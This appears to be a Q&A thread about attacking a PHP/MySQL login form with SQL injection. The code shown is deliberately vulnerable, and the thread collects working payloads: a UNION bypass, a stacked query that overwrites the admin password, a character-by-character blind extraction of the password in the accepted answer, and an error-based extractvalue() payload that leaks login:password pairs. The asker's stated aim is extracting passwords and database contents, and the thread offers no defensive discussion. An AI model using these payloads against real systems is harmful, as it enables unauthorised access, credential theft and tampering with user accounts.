# How To Extract Information On Login using SQL Injection?

Tags: php, mysql, sql, sql-injection, code-injection

This is the back-end PHP code which where I will test the vulnerability.

```
if(isset($_POST["login"]) && isset($_POST["password"])){

$login = $_POST["login"];
$password = $_POST["password"];

$sql="SELECT * FROM users WHERE login='$login' AND password='$password'";

$result= mysqli_query($conn, $sql);

if(mysqli_num_rows($result) != 0){


    echo "<h1>Login Success!</h1>";

    $row = mysqli_fetch_array($result);
    extract($row);

    echo "Welcome , ".$login;


}
```

This is the code I will inject the login field.

```
' UNION SELECT * FROM users --
```

It seems I am able to login but what should I do to have the passwords displayed in a error message or anything on the web page once the injection is made?

Like what query you guys recommend to be appended to the code to extract passwords , database information , all tables etc.

Do take note I have limited SQL Knowledge so I might not know any queries to do the trick.

**Assuming the back-end or server-side PHP code also accepts multi query execution. I would like to know solutions on how do I achieve extracting passwords via multi query injection too?**

Something like the below code which I can update user's details assuming I know there is an admin user in there when I input it into the login field

```
' OR 1 = 1; UPDATE users SET password='stackOverFlow' WHERE login='admin' --
```

**Recommend me both solutions about displaying passwords or useful information on the web page with just code injection in the login fields instead of URL Injection where if the server can execute multi SQL query or if the server cannot execute multi query.**

Comment: The simplest approach is usually crafting a UNION query. However, questions about SQL injection options are usually too broad (without concrete prior attempts / db structure / etc.)

Comment: Look at what [SQLMap](http://sqlmap.org) does. It can drive a truck through just about anything.

Comment: What about `' OR login='root' OR login='`? Not every vulnerability will give you exactly what you're looking for. Like lock-picking you need to fiddle around a bit.

Comment: Looking 'blind sql injection'. In your case, you don't print any thing from database but the key is login success or fail. Example: ' union select * from user where login='admin' and SUBSTRING(password, 1, 1)='a' --

Comment: Yes @Nguyên Ngô Duy , is there anything to do on server-side code instead?
Logical sense I mean for it to print the results like welcome "username here"

We can print results from username?

Comment: no, don't change any code in server. Use blind sql is enough

Answer (score 4, accepted):

1. You can send input many time hy change 'a' to 'z'

   ```
   ' union select * from user where login='admin' and SUBSTRING(password, 1, 1)='a' --
   ```
2. when login success, the first character in password is 'a' or 'z'.
3. Loop throght step 1 change SUBSTRING(password, 1, 1) to SUBSTRING(password, 2, 1) to detect second character in password

Comment: Thank you very much. Apparently your code make sense to me. I never though of substring in SQL even though I learned in Java. My bad!

Yes login success but the thing is my server-side code can't print anything related to it.

Is there any way to display it in a error message etc on the web page? Or logical change can be made on server-side code to let it display the characters of the password?

Comment: code in server is blackbox. In blind SQL Injection, information is true or false. True: website has "Welcome , ", Fail: vice vesa

Comment: So there is no possible way print the passwords like in a error message etc?

or in the welcome , "password here" since Blind SQLI's output is about true or false

Answer (score 0):

Assumed that your code will print out SQL error to html response, you can use error based SQL injection.

I get the reference from this site https://perspectiverisk.com/mysql-sql-injection-practical-cheat-sheet/

> The **ExtractValue()** function generates a SQL error when it is unable to parse the XML data passed to it. Fortunately, the XML data, and, in our case, the evaluated results of our SQL query, will be be embedded into the subsequent error message. Prepending a full stop or a colon (we use the hex representation of 0x3a below) to the beginning of the XML query will ensure the parsing will always fail, thus generating an error with our extracted data. **Note that this only works on MySQL version 5.1 or later**. Use the LIMIT function to cycle through database information.

In the password input you can do something like

> ' AND extractvalue(rand(),concat(0x3a,(SELECT concat(login,0x3a,password) FROM users LIMIT 0,1)))--

And error will be something like

> OperationalError: (1105, "XPATH syntax error: ':username:password'")